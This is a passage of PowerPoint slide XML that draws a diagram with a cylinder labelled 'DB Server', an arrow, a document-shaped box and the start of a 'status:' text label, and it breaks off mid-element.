      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="object 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1816607" y="2084663"/>
            <a:ext cx="4236720" cy="1264920"/>
            <a:chOff x="1362455" y="1563497"/>
            <a:chExt cx="3177540" cy="948690"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="object 28"/>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9" name="object 29"/>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30" name="object 30"/>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31" name="object 31"/>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32" name="object 32"/>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33" name="object 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6019800" y="4218585"/>
            <a:ext cx="2413000" cy="1490980"/>
            <a:chOff x="4514850" y="3163938"/>
            <a:chExt cx="1809750" cy="1118235"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="object 34"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4876800" y="3163938"/>
              <a:ext cx="1041895" cy="804557"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="object 35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4514850" y="3943349"/>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6" name="object 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019800" y="5257801"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="37" name="object 37"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10446851" y="1144185"/>
            <a:ext cx="1303867" cy="1722967"/>
            <a:chOff x="7835138" y="858138"/>
            <a:chExt cx="977900" cy="1292225"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="object 38"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7847838" y="989964"/>
              <a:ext cx="952500" cy="1148080"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="952500" h="1148080">
                  <a:moveTo>
                    <a:pt x="952500" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="932335" y="34392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875771" y="64824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835680" y="78098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788701" y="89832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735569" y="99843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677021" y="107949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613794" y="113965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546624" y="117710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476250" y="118999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405875" y="117710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338705" y="113965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275478" y="107949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216930" y="99843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163798" y="89832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116819" y="78098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76728" y="64824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20164" y="34392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1028700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20164" y="1063092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76728" y="1093524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116819" y="1106798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163798" y="1118532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216930" y="1128543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275478" y="1136649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338705" y="1142665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405875" y="1146410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476250" y="1147699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546624" y="1146410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613794" y="1142665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677021" y="1136649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735569" y="1128543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788701" y="1118532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835680" y="1106798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875771" y="1093524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="932335" y="1063092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="952500" y="1028700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="952500" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4F81BC"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="object 39"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7847838" y="870838"/>
              <a:ext cx="952500" cy="238125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="952500" h="238125">
                  <a:moveTo>
                    <a:pt x="476250" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="405875" y="1291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338705" y="5044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275478" y="11072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216930" y="19193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163798" y="29221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116819" y="40972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76728" y="54263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20164" y="84722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="119125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5163" y="136725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44265" y="169320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116819" y="197224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163798" y="208958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216930" y="218969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275478" y="227075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338705" y="233091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405875" y="236836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476250" y="238125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546624" y="236836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613794" y="233091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677021" y="227075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735569" y="218969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788701" y="208958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835680" y="197224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875771" y="183950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="932335" y="153518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="952500" y="119125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="947336" y="101523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="908234" y="68907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835680" y="40972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788701" y="29221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735569" y="19193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677021" y="11072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613794" y="5044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546624" y="1291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476250" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="94B3D6"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="object 40"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7847838" y="870838"/>
              <a:ext cx="952500" cy="1266825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="952500" h="1266825">
                  <a:moveTo>
                    <a:pt x="952500" y="119125"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="932335" y="153518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875771" y="183950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835680" y="197224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788701" y="208958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735569" y="218969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677021" y="227075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613794" y="233091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546624" y="236836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476250" y="238125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405875" y="236836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338705" y="233091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275478" y="227075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216930" y="218969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163798" y="208958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116819" y="197224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76728" y="183950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20164" y="153518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="119125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5163" y="101523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44265" y="68907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116819" y="40972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163798" y="29221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216930" y="19193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275478" y="11072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338705" y="5044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405875" y="1291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476250" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546624" y="1291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613794" y="5044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677021" y="11072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735569" y="19193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788701" y="29221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835680" y="40972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875771" y="54263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="932335" y="84722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="952500" y="119125"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="952500" h="1266825">
                  <a:moveTo>
                    <a:pt x="952500" y="119125"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="952500" y="1147826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="947336" y="1165425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="908234" y="1198020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835680" y="1225924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788701" y="1237658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735569" y="1247669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677021" y="1255775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613794" y="1261791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546624" y="1265536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476250" y="1266825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405875" y="1265536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338705" y="1261791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275478" y="1255775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216930" y="1247669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163798" y="1237658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116819" y="1225924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76728" y="1212650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20164" y="1182218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1147826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="119125"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="385D89"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="object 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10685272" y="1682664"/>
            <a:ext cx="828040" cy="755762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1693" algn="ctr">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>DB</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="42" name="object 42"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8595698" y="1583267"/>
            <a:ext cx="1868593" cy="1483360"/>
            <a:chOff x="6446773" y="1187450"/>
            <a:chExt cx="1401445" cy="1112520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="object 43"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6887590" y="1800351"/>
              <a:ext cx="960755" cy="499109"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="960754" h="499110">
                  <a:moveTo>
                    <a:pt x="854860" y="42247"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="464947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16890" y="499110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="871792" y="76390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="892617" y="44861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="854860" y="42247"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="960754" h="499110">
                  <a:moveTo>
                    <a:pt x="956675" y="11049"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="917955" y="11049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934847" y="45212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="871792" y="76390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837691" y="128016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="834828" y="135018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="834882" y="142319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837674" y="149072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="843026" y="154431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="850028" y="157293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="857329" y="157225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864082" y="154396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="869441" y="148971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="960374" y="11302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="956675" y="11049"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="960754" h="499110">
                  <a:moveTo>
                    <a:pt x="892617" y="44861"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="871792" y="76390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930994" y="47117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925194" y="47117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="892617" y="44861"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="960754" h="499110">
                  <a:moveTo>
                    <a:pt x="910589" y="17652"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="892617" y="44861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925194" y="47117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="910589" y="17652"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="960754" h="499110">
                  <a:moveTo>
                    <a:pt x="921221" y="17652"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="910589" y="17652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925194" y="47117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930994" y="47117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934847" y="45212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="921221" y="17652"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="960754" h="499110">
                  <a:moveTo>
                    <a:pt x="917955" y="11049"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="854860" y="42247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="892617" y="44861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="910589" y="17652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="921221" y="17652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="917955" y="11049"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="960754" h="499110">
                  <a:moveTo>
                    <a:pt x="795781" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="788267" y="972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="781954" y="4635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777476" y="10394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="775461" y="17652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="776434" y="25185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780097" y="31527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785856" y="36012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="793114" y="37973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="854860" y="42247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="917955" y="11049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="956675" y="11049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795781" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="object 44"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6459473" y="1200150"/>
              <a:ext cx="1295400" cy="762635"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1295400" h="762635">
                  <a:moveTo>
                    <a:pt x="1295400" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="762126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1006982" y="762126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1295400" y="473583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1295400" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="object 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7466456" y="1673733"/>
              <a:ext cx="288925" cy="288925"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="288925" h="288925">
                  <a:moveTo>
                    <a:pt x="288417" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="57658" y="57657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="288543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288417" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CDCDCD"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="object 46"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6459473" y="1200150"/>
              <a:ext cx="1295400" cy="762635"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1295400" h="762635">
                  <a:moveTo>
                    <a:pt x="1006982" y="762126"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1064641" y="531240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1295400" y="473583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1006982" y="762126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="762126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1295400" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1295400" y="473583"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="object 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8907273" y="1631356"/>
            <a:ext cx="1137073" cy="755762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773" indent="1693" algn="ctr">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>status: </a:t>
            </a:r>
            <a:r>
